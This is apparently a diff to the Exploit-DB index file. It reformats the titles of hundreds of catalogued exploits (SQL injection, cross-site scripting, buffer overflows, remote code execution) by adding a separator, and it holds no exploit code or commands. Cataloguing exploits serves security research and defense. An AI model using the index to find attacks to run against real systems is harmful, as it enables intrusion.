Vulnerabilities",2008-01-31,"Frederic Loudet",novell,remote,0 31096,platforms/php/webapps/31096.txt,"WordPress Plugin ShiftThis Newsletter - SQL Injection",2008-02-03,S@BUN,php,webapps,0 31097,platforms/php/webapps/31097.txt,"CruxCMS 3.0 - 'search.php' Cross-Site Scripting",2008-02-04,Psiczn,php,webapps,0 31098,platforms/php/webapps/31098.txt,"Simple OS CMS 0.1c_beta - 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0 31099,platforms/php/webapps/31099.txt,"Codice CMS - 'login.php' SQL Injection",2008-02-04,Psiczn,php,webapps,0 31100,platforms/multiple/dos/31100.txt,"Anon Proxy Server 0.100/0.102 - Remote Authentication Buffer Overflow",2008-02-04,L4teral,multiple,dos,0 31101,platforms/php/webapps/31101.txt,"HispaH Youtube Clone - 'load_message.php' Cross-Site Scripting",2008-02-04,Smasher,php,webapps,0 -31102,platforms/hardware/dos/31102.c,"MikroTik RouterOS 3.0 SNMP SET Denial of Service",2008-02-04,ShadOS,hardware,dos,0 +31102,platforms/hardware/dos/31102.c,"MikroTik RouterOS 3.0 - SNMP SET Denial of Service",2008-02-04,ShadOS,hardware,dos,0 31103,platforms/asp/webapps/31103.txt,"AstroSoft HelpDesk - operator/article/article_search_results.asp txtSearch Parameter XSS",2008-02-04,"Alexandr Polyakov",asp,webapps,0 31104,platforms/asp/webapps/31104.txt,"AstroSoft HelpDesk - operator/article/article_attachment.asp Attach_Id Parameter XSS",2008-02-04,"Alexandr Polyakov",asp,webapps,0 -31105,platforms/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 DELE Command Remote Buffer Overflow",2008-02-04,j0rgan,windows,dos,0 +31105,platforms/windows/dos/31105.py,"Titan FTP Server 6.05 build 550 - DELE Command Remote Buffer Overflow",2008-02-04,j0rgan,windows,dos,0 31106,platforms/multiple/remote/31106.txt,"WinComLPD Total 3.0.2.623 - (Buffer Overflow and Authentication Bypass) Multiple Vulnerabilities",2008-02-04,"Luigi Auriemma",multiple,remote,0 31107,platforms/php/webapps/31107.txt,"Portail Web Php 2.5.1 - config/conf-activation.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 31108,platforms/php/webapps/31108.txt,"Portail Web Php 2.5.1 - menu/item.php site_path Parameter Remote File Inclusion",2008-02-04,Psiczn,php,webapps,0 @@ -28015,7 +28010,7 @@ id,file,description,date,author,platform,type,port 31130,platforms/multiple/remote/31130.txt,"Apache Tomcat 6.0.15 - Cookie Quote Handling Remote Information Disclosure",2008-02-09,"John Kew",multiple,remote,0 31131,platforms/php/webapps/31131.txt,"PK-Designs PKs Movie Database 3.0.3 - 'index.php' SQL Injection / Cross-Site Scripting",2008-02-09,Houssamix,php,webapps,0 31132,platforms/hardware/remote/31132.txt,"Group Logic ExtremeZ-IP File and Print Servers 5.1.2 x15 - Multiple Vulnerabilities",2008-02-10,"Luigi Auriemma",hardware,remote,0 -31133,platforms/hardware/remote/31133.txt,"F5 BIG-IP 9.4.3 Web Management Interface Cross-Site Request Forgery",2008-02-11,nnposter,hardware,remote,0 +31133,platforms/hardware/remote/31133.txt,"F5 BIG-IP 9.4.3 - Web Management Interface Cross-Site Request Forgery",2008-02-11,nnposter,hardware,remote,0 31134,platforms/php/webapps/31134.txt,"VWar 1.5 - 'calendar.php' SQL Injection",2008-02-11,Pouya_Server,php,webapps,0 31135,platforms/php/webapps/31135.txt,"Rapid-Source Rapid-Recipe Component - Multiple SQL Injection",2008-02-11,breaker_unit,php,webapps,0 31136,platforms/multiple/dos/31136.txt,"cyan soft - Multiple Applications Format String and Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0 @@ -28033,7 +28028,7 @@ id,file,description,date,author,platform,type,port 31148,platforms/multiple/dos/31148.txt,"Opium OPI Server and CyanPrintIP - Format String / Denial of Service",2008-02-11,"Luigi Auriemma",multiple,dos,0 31149,platforms/windows/remote/31149.txt,"Sentinel Protection Server 7.x/Keys Server 1.0.x - Backslash Directory Traversal",2008-02-11,"Luigi Auriemma",windows,remote,0 31150,platforms/multiple/dos/31150.txt,"RPM Remote Print Manager 4.5.1 - Service Remote Buffer Overflow",2008-02-11,"Luigi Auriemma",multiple,dos,0 -31151,platforms/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin Local Stack Based Buffer Overflow",2008-02-12,forensec,linux,local,0 +31151,platforms/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin - Local Stack Based Buffer Overflow",2008-02-12,forensec,linux,local,0 31152,platforms/php/webapps/31152.txt,"artmedic weblog - artmedic_print.php date Parameter XSS",2008-02-12,muuratsalo,php,webapps,0 31153,platforms/php/webapps/31153.txt,"artmedic weblog - index.php jahrneu Parameter XSS",2008-02-12,muuratsalo,php,webapps,0 31154,platforms/php/webapps/31154.txt,"Counter Strike Portals - 'download' SQL Injection",2008-02-12,S@BUN,php,webapps,0 @@ -28220,7 +28215,7 @@ id,file,description,date,author,platform,type,port 31339,platforms/php/webapps/31339.txt,"PHP-Nuke Yellow_Pages Module - 'cid' Parameter SQL Injection",2008-03-05,ZoRLu,php,webapps,0 31340,platforms/hardware/remote/31340.html,"Check Point VPN-1 UTM Edge NGX 7.0.48x - Login Page Cross-Site Scripting",2008-03-06,"Henri Lindberg",hardware,remote,0 31341,platforms/php/webapps/31341.txt,"Yap Blog 1.1 - 'index.php' Remote File Inclusion",2008-03-06,THE_MILLER,php,webapps,0 -31342,platforms/hardware/remote/31342.txt,"Airspan ProST WiMAX Device Web Interface Authentication Bypass",2008-03-06,"Francis Lacoste-Cordeau",hardware,remote,0 +31342,platforms/hardware/remote/31342.txt,"Airspan ProST WiMAX Device - Web Interface Authentication Bypass",2008-03-06,"Francis Lacoste-Cordeau",hardware,remote,0 31343,platforms/multiple/dos/31343.txt,"Sun Java Runtime Environment 1.x - Image Parsing Heap Buffer Overflow",2008-03-06,"Chris Evans",multiple,dos,0 31344,platforms/php/webapps/31344.pl,"PHP-Nuke KutubiSitte Module - 'kid' Parameter SQL Injection",2008-03-06,r080cy90r,php,webapps,0 31345,platforms/windows/remote/31345.txt,"MicroWorld eScan Server 9.0.742 - Directory Traversal",2008-03-06,"Luigi Auriemma",windows,remote,0 @@ -28310,7 +28305,7 @@ id,file,description,date,author,platform,type,port 31431,platforms/php/webapps/31431.txt,"ImpressCMS 1.3.5 - Multiple Vulnerabilities",2014-02-05,"Pedro Ribeiro",php,webapps,80 31432,platforms/linux/remote/31432.rb,"SkyBlueCanvas CMS - Remote Code Execution",2014-02-05,Metasploit,linux,remote,0 31433,platforms/multiple/remote/31433.rb,"Apache Tomcat Manager - Application Upload Authenticated Code Execution",2014-02-05,Metasploit,multiple,remote,80 -31434,platforms/java/remote/31434.rb,"Apache Struts Developer Mode OGNL Execution",2014-02-05,Metasploit,java,remote,8080 +31434,platforms/java/remote/31434.rb,"Apache Struts - Developer Mode OGNL Execution",2014-02-05,Metasploit,java,remote,8080 31435,platforms/php/webapps/31435.py,"Joomla JomSocial Component 2.6 - Code Execution Exploit",2014-02-05,"Matias Fontanini",php,webapps,80 31436,platforms/php/webapps/31436.txt,"Pandora Fms 5.0RC1 - Remote Command Injection",2014-02-05,xistence,php,webapps,80 31438,platforms/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 - Multiple Parameters Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,java,webapps,0 @@ -28548,7 +28543,7 @@ id,file,description,date,author,platform,type,port 31686,platforms/multiple/webapps/31686.py,"Dexter (CasinoLoader) Panel - SQL Injection",2014-02-16,bwall,multiple,webapps,80 31688,platforms/windows/local/31688.pl,"ImageMagick 6.8.8-4 - Local Buffer Overflow (SEH)",2014-02-16,"Mike Czumak",windows,local,0 31689,platforms/windows/remote/31689.py,"HP Data Protector - EXEC_BAR Remote Command Execution",2014-02-16,"Chris Graham",windows,remote,5555 -31690,platforms/hardware/webapps/31690.txt,"Trendchip HG520 ADSL2+ Wireless Modem CSRF",2014-02-16,"Dhruv Shah",hardware,webapps,80 +31690,platforms/hardware/webapps/31690.txt,"Trendchip HG520 ADSL2+ Wireless Modem - CSRF",2014-02-16,"Dhruv Shah",hardware,webapps,80 31691,platforms/ios/webapps/31691.txt,"Office Assistant Pro 2.2.2 iOS - File Include",2014-02-16,Vulnerability-Lab,ios,webapps,8080 31692,platforms/ios/webapps/31692.txt,"mbDriveHD 1.0.7 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,ios,webapps,8080 31693,platforms/ios/webapps/31693.txt,"File Hub 1.9.1 iOS - Multiple Vulnerabilities",2014-02-16,Vulnerability-Lab,ios,webapps,8080 @@ -28789,12 +28784,12 @@ id,file,description,date,author,platform,type,port 31938,platforms/php/webapps/31938.txt,"KEIL Software photokorn 1.542 - 'index.php' SQL Injection",2008-06-18,t@nzo0n,php,webapps,0 31939,platforms/php/webapps/31939.txt,"vBulletin 3.7.1 - Moderation Control Panel 'redirect' Parameter Cross-Site Scripting",2008-06-19,"Jessica Hope",php,webapps,0 31940,platforms/osx/local/31940.txt,"Apple Mac OS X 10.x - AppleScript ARDAgent Shell Local Privilege Escalation",2008-06-19,anonymous,osx,local,0 -31941,platforms/multiple/remote/31941.txt,"WISE-FTP 4.1/5.5.8 FTP Client 'LIST' Command Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 +31941,platforms/multiple/remote/31941.txt,"WISE-FTP 4.1/5.5.8 - FTP Client 'LIST' Command Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 31942,platforms/multiple/remote/31942.txt,"Classic FTP 1.02 - 'LIST' Command Directory Traversal",2008-06-20,"Tan Chew Keong",multiple,remote,0 31943,platforms/php/webapps/31943.html,"GL-SH Deaf Forum 6.5.5 - Cross-Site Scripting / Arbitrary File Upload",2008-06-20,"AmnPardaz ",php,webapps,0 32214,platforms/php/webapps/32214.pl,"FreePBX 2.11.0 - Remote Command Execution",2014-03-12,@0x00string,php,webapps,80 31944,platforms/php/webapps/31944.txt,"PHPAuction - 'profile.php' SQL Injection",2008-06-21,Mr.SQL,php,webapps,0 -31945,platforms/php/webapps/31945.txt,"PEGames Multiple Cross-Site Scripting Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 +31945,platforms/php/webapps/31945.txt,"PEGames - Multiple Cross-Site Scripting Vulnerabilities",2008-06-23,CraCkEr,php,webapps,0 31946,platforms/php/webapps/31946.txt,"IDMOS 1.0 - 'site_absolute_path' Parameter Multiple Remote File Inclusion",2008-06-23,CraCkEr,php,webapps,0 31947,platforms/php/webapps/31947.txt,"EXP Shop 1.0 Joomla! 'com_expshop' Component - SQL Injection",2008-06-22,His0k4,php,webapps,0 31948,platforms/php/webapps/31948.txt,"Open Digital Assets Repository System 1.0.2 - Remote File Inclusion",2008-06-22,CraCkEr,php,webapps,0 @@ -28929,7 +28924,7 @@ id,file,description,date,author,platform,type,port 32081,platforms/php/webapps/32081.txt,"Lemon CMS 1.10 - 'browser.php' Local File Inclusion",2008-07-18,Ciph3r,php,webapps,0 32082,platforms/php/webapps/32082.txt,"Def_Blog 1.0.3 - comaddok.php article Parameter SQL Injection",2008-07-18,"CWH Underground",php,webapps,0 32083,platforms/php/webapps/32083.txt,"Def_Blog 1.0.3 - comlook.php article Parameter SQL Injection",2008-07-18,"CWH Underground",php,webapps,0 -32084,platforms/multiple/remote/32084.txt,"SmbClientParser 2.7 Perl Module Remote Command Execution",2008-07-18,"Jesus Olmos Gonzalez",multiple,remote,0 +32084,platforms/multiple/remote/32084.txt,"SmbClientParser 2.7 - Perl Module Remote Command Execution",2008-07-18,"Jesus Olmos Gonzalez",multiple,remote,0 32085,platforms/php/webapps/32085.txt,"phpFreeChat 1.1 - 'demo21_with_hardocded_urls.php' Cross-Site Scripting",2008-07-18,ahmadbady,php,webapps,0 32086,platforms/multiple/dos/32086.c,"SWAT 4 - Multiple Denial Of Service Vulnerabilities",2008-07-20,"Luigi Auriemma",multiple,dos,0 32087,platforms/php/webapps/32087.txt,"EasyBookMarker 4.0 - 'ajaxp_backend.php' Cross-Site Scripting",2008-07-21,Dr.Crash,php,webapps,0 @@ -29029,7 +29024,7 @@ id,file,description,date,author,platform,type,port 32190,platforms/php/webapps/32190.txt,"Kshop 2.22 - 'kshop_search.php' Cross-Site Scripting",2008-08-06,Lostmon,php,webapps,0 32191,platforms/php/webapps/32191.txt,"PHP-Nuke Kleinanzeigen Module - 'lid' Parameter SQL Injection",2008-08-06,Lovebug,php,webapps,0 32192,platforms/multiple/dos/32192.txt,"Combat Evolved 1.0.7.0615 - Multiple Denial Of Service Vulnerabilities",2008-08-06,"Luigi Auriemma",multiple,dos,0 -32193,platforms/multiple/dos/32193.txt,"OpenVms 8.3 Finger Service Stack Based Buffer Overflow",2008-08-07,"Shaun Colley",multiple,dos,0 +32193,platforms/multiple/dos/32193.txt,"OpenVms 8.3 Finger Service - Stack Based Buffer Overflow",2008-08-07,"Shaun Colley",multiple,dos,0 32194,platforms/multiple/dos/32194.txt,"NoticeWare Email Server 4.6 - NG LOGIN Messages Denial Of Service",2008-08-06,Antunes,multiple,dos,0 32195,platforms/multiple/dos/32195.txt,"Qbik WinGate 6.2.2 - LIST Command Remote Denial of Service",2008-08-08,Antunes,multiple,dos,0 32196,platforms/php/webapps/32196.txt,"RMSOFT MiniShop 1.0 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-09,Lostmon,php,webapps,0 @@ -29055,7 +29050,7 @@ id,file,description,date,author,platform,type,port 32219,platforms/php/webapps/32219.txt,"Kayako SupportSuite 3.x - visitor/index.php sessionid Parameter XSS",2008-08-11,"James Bercegay",php,webapps,0 32220,platforms/php/webapps/32220.txt,"Kayako SupportSuite 3.x - index.php filter Parameter XSS",2008-08-11,"James Bercegay",php,webapps,0 32221,platforms/php/webapps/32221.txt,"Kayako SupportSuite 3.x - staff/index.php customfieldlinkid Parameter SQL Injection",2008-08-11,"James Bercegay",php,webapps,0 -32222,platforms/multiple/dos/32222.rb,"Ruby 1.9 WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request DoS",2008-08-11,"Keita Yamaguchi",multiple,dos,0 +32222,platforms/multiple/dos/32222.rb,"Ruby 1.9 - WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request DoS",2008-08-11,"Keita Yamaguchi",multiple,dos,0 32223,platforms/multiple/remote/32223.rb,"Ruby 1.9 dl - Module DL.dlopen Arbitrary Library Access",2008-08-11,"Keita Yamaguchi",multiple,remote,0 32224,platforms/multiple/remote/32224.rb,"Ruby 1.9 - Safe Level Multiple Function Restriction Bypass",2008-08-11,"Keita Yamaguchi",multiple,remote,0 32225,platforms/linux/remote/32225.txt,"Vim 'mch_expand_wildcards()' - Heap Based Buffer Overflow",2005-01-29,"Brian Hirt",linux,remote,0 @@ -29082,7 +29077,7 @@ id,file,description,date,author,platform,type,port 32253,platforms/php/webapps/32253.txt,"Mambo Open Source 4.6.2 - mambots/editors/mostlyce/ php/connector.php Query String XSS",2008-08-15,"Khashayar Fereidani",php,webapps,0 32254,platforms/php/webapps/32254.txt,"FlexCMS 2.5 - 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting",2008-08-15,Dr.Crash,php,webapps,0 32255,platforms/asp/webapps/32255.txt,"FipsCMS 2.1 - 'forum/neu.asp' SQL Injection",2008-08-15,U238,asp,webapps,0 -32256,platforms/windows/dos/32256.py,"Ipswitch 8.0 WS_FTP Client Format String",2008-08-17,securfrog,windows,dos,0 +32256,platforms/windows/dos/32256.py,"Ipswitch 8.0 - WS_FTP Client Format String",2008-08-17,securfrog,windows,dos,0 32257,platforms/php/webapps/32257.txt,"PromoProducts - 'view_product.php' Multiple SQL Injection",2008-08-15,baltazar,php,webapps,0 32258,platforms/cgi/webapps/32258.txt,"AWStats 6.8 - 'awstats.pl' Cross-Site Scripting",2008-08-18,"Morgan Todd",cgi,webapps,0 32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 - english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 @@ -29097,7 +29092,7 @@ id,file,description,date,author,platform,type,port 32268,platforms/php/webapps/32268.txt,"Freeway 1.4.1.171 - templates/Freeway/boxes/loginbox.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32269,platforms/php/webapps/32269.txt,"Freeway 1.4.1.171 - templates/Freeway/boxes/whos_online.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32270,platforms/php/webapps/32270.txt,"Freeway 1.4.1.171 - templates/Freeway/mainpage_modules/mainpage.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 -32271,platforms/php/webapps/32271.txt,"NewsHOWLER 1.03 Cookie Data SQL Injection",2008-08-18,"Khashayar Fereidani",php,webapps,0 +32271,platforms/php/webapps/32271.txt,"NewsHOWLER 1.03 - Cookie Data SQL Injection",2008-08-18,"Khashayar Fereidani",php,webapps,0 32272,platforms/php/webapps/32272.txt,"Ovidentia 6.6.5 - 'index.php' Cross-Site Scripting",2008-08-18,"ThE dE@Th",php,webapps,0 32368,platforms/jsp/webapps/32368.txt,"McAfee Asset Manager 6.6 - Multiple Vulnerabilities",2014-03-19,"Brandon Perry",jsp,webapps,80 32274,platforms/php/webapps/32274.txt,"Synology DSM 4.3-3827 - (article.php) Blind SQL Injection",2014-03-14,"Michael Wisniewski",php,webapps,80 @@ -29106,14 +29101,14 @@ id,file,description,date,author,platform,type,port 32278,platforms/asp/webapps/32278.txt,"K Web CMS - 'sayfala.asp' SQL Injection",2008-08-18,baltazar,asp,webapps,0 32279,platforms/php/webapps/32279.txt,"Vanilla 1.1.4 - HTML Injection / Cross-Site Scripting",2008-08-19,"James Bercegay",php,webapps,0 32280,platforms/php/webapps/32280.txt,"YourFreeWorld Ad-Exchange Script - 'id' Parameter SQL Injection",2008-08-20,"Hussin X",php,webapps,0 -32281,platforms/php/webapps/32281.cs,"Folder Lock 5.9.5 Weak Password Encryption Local Information Disclosure",2008-06-19,"Charalambous Glafkos",php,webapps,0 +32281,platforms/php/webapps/32281.cs,"Folder Lock 5.9.5 - Weak Password Encryption Local Information Disclosure",2008-06-19,"Charalambous Glafkos",php,webapps,0 32287,platforms/php/webapps/32287.txt,"FAR-PHP 1.0 - 'index.php' Local File Inclusion",2008-08-21,"Beenu Arora",php,webapps,0 32288,platforms/php/webapps/32288.txt,"TimeTrex Time 2.2 and Attendance Module - Multiple Cross-Site Scripting Vulnerabilities",2008-08-21,Doz,php,webapps,0 32289,platforms/linux/remote/32289.txt,"Vim 7.1.314 - Insufficient Shell Escaping Multiple Command Execution Vulnerabilities",2008-08-19,"Ben Schmidt",linux,remote,0 32290,platforms/php/webapps/32290.txt,"Accellion File Transfer - Multiple Cross-Site Scripting Vulnerabilities",2008-08-22,"Eric Beaulieu",php,webapps,0 32291,platforms/php/webapps/32291.txt,"PicturesPro Photo Cart 3.9 - Search Cross-Site Scripting",2008-08-22,"Tyler Trioxide",php,webapps,0 32292,platforms/linux/dos/32292.rb,"Ruby 1.9 - REXML Remote Denial Of Service",2008-08-23,"Luka Treiber",linux,dos,0 -32293,platforms/php/webapps/32293.txt,"One-News Multiple Input Validation Vulnerabilities",2008-08-23,suN8Hclf,php,webapps,0 +32293,platforms/php/webapps/32293.txt,"One-News - Multiple Input Validation Vulnerabilities",2008-08-23,suN8Hclf,php,webapps,0 32294,platforms/windows/dos/32294.html,"Microsoft Windows Media Services 'nskey.dll' 4.1 - ActiveX Control Remote Buffer Overflow",2008-08-22,"Jeremy Brown",windows,dos,0 32295,platforms/php/webapps/32295.txt,"PHP-Ultimate Webboard 2.0 - 'admindel.php' Multiple Input Validation Vulnerabilities",2008-08-25,t0pP8uZz,php,webapps,0 32296,platforms/php/webapps/32296.txt,"Bluemoon inc. PopnupBlog 3.30 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-25,Lostmon,php,webapps,0 @@ -29217,9 +29212,9 @@ id,file,description,date,author,platform,type,port 32435,platforms/windows/dos/32435.c,"Immunity Debugger 1.85 - Stack Overflow (PoC)",2014-03-22,"Veysel HATAS",windows,dos,0 32437,platforms/php/webapps/32437.txt,"LifeSize UVC 1.2.6 - Authenticated RCE",2014-03-22,"Brandon Perry",php,webapps,0 32438,platforms/windows/remote/32438.rb,"Microsoft Internet Explorer - TextRange Use-After-Free (MS14-012)",2014-03-22,Metasploit,windows,remote,0 -32439,platforms/php/remote/32439.rb,"Horde Framework Unserialize PHP Code Execution",2014-03-22,Metasploit,php,remote,80 +32439,platforms/php/remote/32439.rb,"Horde Framework - Unserialize PHP Code Execution",2014-03-22,Metasploit,php,remote,80 32440,platforms/hardware/remote/32440.rb,"Array Networks vAPV and vxAG - Private Key Privilege Escalation Code Execution",2014-03-22,Metasploit,hardware,remote,22 -32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 Cookie Authentication Bypass",2008-09-29,Crackers_Child,php,webapps,0 +32441,platforms/php/webapps/32441.txt,"PHPJabbers Post Comments 3.0 - Cookie Authentication Bypass",2008-09-29,Crackers_Child,php,webapps,0 32442,platforms/windows/remote/32442.c,"Nokia PC Suite 7.0 - Remote Buffer Overflow",2008-09-29,Ciph3r,windows,remote,0 32443,platforms/php/webapps/32443.txt,"CAcert - 'analyse.php' Cross-Site Scripting",2008-09-29,"Alexander Klink",php,webapps,0 32444,platforms/php/webapps/32444.txt,"WordPress MU 1.2/1.3 - 'wp-admin/wpmu-blogs.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-29,"Juan Galiana Lara",php,webapps,0 @@ -29244,13 +29239,13 @@ id,file,description,date,author,platform,type,port 32463,platforms/php/webapps/32463.txt,"PHP Web Explorer 0.99b - main.php refer Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 32464,platforms/php/webapps/32464.txt,"PHP Web Explorer 0.99b - edit.php file Parameter Traversal Local File Inclusion",2008-10-06,Pepelux,php,webapps,0 32465,platforms/windows/remote/32465.pl,"Internet Download Manager 4.0.5 - File Parsing Buffer Overflow",2008-10-06,Ciph3r,windows,remote,0 -32466,platforms/multiple/remote/32466.html,"Mozilla Firefox 3.0.3 Internet Shortcut Same Origin Policy Violation",2008-10-07,"Liu Die Yu",multiple,remote,0 -32467,platforms/php/webapps/32467.txt,"Opera Web Browser 8.51 URI Redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps,0 +32466,platforms/multiple/remote/32466.html,"Mozilla Firefox 3.0.3 - Internet Shortcut Same Origin Policy Violation",2008-10-07,"Liu Die Yu",multiple,remote,0 +32467,platforms/php/webapps/32467.txt,"Opera Web Browser 8.51 - URI Redirection Remote Code Execution",2008-10-08,MATASANOS,php,webapps,0 32468,platforms/php/webapps/32468.txt,"DFFFrameworkAPI - 'DFF_config[dir_include]' Parameter Multiple Remote File Inclusion",2008-10-08,GoLd_M,php,webapps,0 32469,platforms/hardware/remote/32469.txt,"Proxim Tsunami MP.11 2411 Wireless Access Point - 'system.sysName.0' SNMP HTML Injection",2008-10-09,"Adrian Pastor",hardware,remote,0 32470,platforms/linux/remote/32470.rb,"CUPS 1.3.7 - 'HP-GL/2' Filter Remote Code Execution",2008-10-09,regenrecht,linux,remote,0 -32471,platforms/linux/dos/32471.txt,"KDE Konqueror 3.5.9 JavaScript 'load' Function Denial of Service",2008-10-10,"Jeremy Brown",linux,dos,0 -32472,platforms/hardware/dos/32472.txt,"Nokia Web Browser for S60 Infinite Array Sort Denial of Service",2008-10-10,"Luca Carettoni",hardware,dos,0 +32471,platforms/linux/dos/32471.txt,"KDE Konqueror 3.5.9 - JavaScript 'load' Function Denial of Service",2008-10-10,"Jeremy Brown",linux,dos,0 +32472,platforms/hardware/dos/32472.txt,"Nokia Web Browser for S60 - Infinite Array Sort Denial of Service",2008-10-10,"Luca Carettoni",hardware,dos,0 32473,platforms/php/webapps/32473.txt,"com_jeux Joomla! Component - 'id' Parameter SQL Injection",2008-10-11,H!tm@N,php,webapps,0 32474,platforms/php/webapps/32474.txt,"EEB-CMS 0.95 - 'index.php' Cross-Site Scripting",2008-10-11,d3v1l,php,webapps,0 32475,platforms/multiple/remote/32475.sql,"Oracle Database Server 11.1 - 'CREATE ANY DIRECTORY' Privilege Escalation",2008-10-13,"Paul M. Wright",multiple,remote,0 @@ -29284,7 +29279,7 @@ id,file,description,date,author,platform,type,port 32502,platforms/php/webapps/32502.txt,"GetSimple CMS 3.3.1 - Persistent Cross-Site Scripting",2014-03-25,"Jeroen - IT Nerdbox",php,webapps,0 32503,platforms/php/webapps/32503.txt,"Cart Engine 3.0.0 - Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0 32504,platforms/php/webapps/32504.txt,"Cart Engine 3.0.0 - (task.php) Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0 -32505,platforms/php/webapps/32505.txt,"Cart Engine 3.0.0 Database Backup Disclosure Exploit",2014-03-25,LiquidWorm,php,webapps,0 +32505,platforms/php/webapps/32505.txt,"Cart Engine 3.0.0 - Database Backup Disclosure Exploit",2014-03-25,LiquidWorm,php,webapps,0 32506,platforms/php/webapps/32506.txt,"Kemana Directory 1.5.6 - kemana_admin_passwd Cookie User Password Hash Disclosure",2014-03-25,LiquidWorm,php,webapps,0 32507,platforms/php/webapps/32507.txt,"Kemana Directory 1.5.6 - Remote Code Execution",2014-03-25,LiquidWorm,php,webapps,0 32508,platforms/php/webapps/32508.txt,"Kemana Directory 1.5.6 - (run param) Local File Inclusion",2014-03-25,LiquidWorm,php,webapps,0 @@ -29320,7 +29315,7 @@ id,file,description,date,author,platform,type,port 32541,platforms/php/webapps/32541.txt,"H&H Solutions WebSoccer 2.80 - 'id' SQL Injection",2008-10-28,d3v1l,php,webapps,0 32542,platforms/php/webapps/32542.txt,"Elkagroup Image Gallery 1.0 - 'view.php' SQL Injection",2008-10-28,G4N0K,php,webapps,0 32543,platforms/php/webapps/32543.txt,"KKE Info Media Kmita Catalogue 2 - 'search.php' Cross-Site Scripting",2008-10-28,cize0f,php,webapps,0 -32544,platforms/php/webapps/32544.txt,"KKE Info Media Kmita Gallery Multiple Cross-Site Scripting Vulnerabilities",2008-10-29,cize0f,php,webapps,0 +32544,platforms/php/webapps/32544.txt,"KKE Info Media Kmita Gallery - Multiple Cross-Site Scripting Vulnerabilities",2008-10-29,cize0f,php,webapps,0 32545,platforms/hardware/webapps/32545.txt,"Allied Telesis AT-RG634A ADSL Broadband Router - Unauthenticated Webshell",2014-03-26,"Groundworks Technologies",hardware,webapps,80 32546,platforms/php/webapps/32546.py,"IBM Tealeaf CX 8.8 - Remote OS Command Injection",2014-03-26,drone,php,webapps,0 32547,platforms/php/webapps/32547.txt,"Extrakt Framework 0.7 - 'index.php' Cross-Site Scripting",2008-10-29,ShockShadow,php,webapps,0 @@ -29328,10 +29323,10 @@ id,file,description,date,author,platform,type,port 32549,platforms/asp/webapps/32549.txt,"Dorsa CMS - 'Default_.aspx' Cross-Site Scripting",2008-10-29,Pouya_Server,asp,webapps,0 32550,platforms/windows/dos/32550.html,"Microsoft DebugDiag 1.0 - 'CrashHangExt.dll' ActiveX Control Remote Denial of Service",2008-10-30,suN8Hclf,windows,dos,0 32551,platforms/linux/dos/32551.txt,"Dovecot 1.1.x - Invalid Message Address Parsing Denial of Service",2008-10-30,anonymous,linux,dos,0 -32552,platforms/hardware/remote/32552.txt,"SonicWALL Content Filtering Blocked Site Error Page Cross-Site Scripting",2008-10-30,pagvac,hardware,remote,0 +32552,platforms/hardware/remote/32552.txt,"SonicWALL - Content Filtering Blocked Site Error Page Cross-Site Scripting",2008-10-30,pagvac,hardware,remote,0 32553,platforms/php/webapps/32553.txt,"phpWebSite 0.9.3 - 'links.php' SQL Injection",2008-10-31,"Beenu Arora",php,webapps,0 32554,platforms/php/webapps/32554.txt,"SpitFire Photo Pro - 'pages.php' SQL Injection",2008-10-31,"Beenu Arora",php,webapps,0 -32555,platforms/windows/remote/32555.html,"Opera Web Browser 9.62 History Search Input Validation",2008-10-31,NeoCoderz,windows,remote,0 +32555,platforms/windows/remote/32555.html,"Opera Web Browser 9.62 - History Search Input Validation",2008-10-31,NeoCoderz,windows,remote,0 32556,platforms/multiple/webapps/32556.txt,"Dell SonicWall EMail Security Appliance Application 7.4.5 - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,multiple,webapps,8619 32557,platforms/ios/webapps/32557.txt,"FTP Drive + HTTP 1.0.4 iOS - Code Execution",2014-03-27,Vulnerability-Lab,ios,webapps,8080 32558,platforms/ios/webapps/32558.txt,"Lazybone Studios WiFi Music 1.0 iOS - Multiple Vulnerabilities",2014-03-27,Vulnerability-Lab,ios,webapps,8080 @@ -29350,7 +29345,7 @@ id,file,description,date,author,platform,type,port 32573,platforms/windows/dos/32573.txt,"Microsoft Windows 2003/Vista - 'UnhookWindowsHookEx' Local Denial Of Service",2008-11-09,killprog.org,windows,dos,0 32574,platforms/java/webapps/32574.txt,"MoinMoin 1.5.8/1.9 - Cross-Site Scripting / Information Disclosure",2008-11-09,"Xia Shing Zee",java,webapps,0 32575,platforms/php/webapps/32575.txt,"Zeeways SHAADICLONE 2.0 - 'admin/home.php' Authentication Bypass",2008-11-08,G4N0K,php,webapps,0 -32576,platforms/multiple/webapps/32576.txt,"IBM Tivoli Netcool Service Quality Manager Cross-Site Scripting And HTML Injection Vulnerabilities",2008-11-10,"Francesco Bianchino",multiple,webapps,0 +32576,platforms/multiple/webapps/32576.txt,"IBM Tivoli Netcool Service Quality Manager - Cross-Site Scripting And HTML Injection Vulnerabilities",2008-11-10,"Francesco Bianchino",multiple,webapps,0 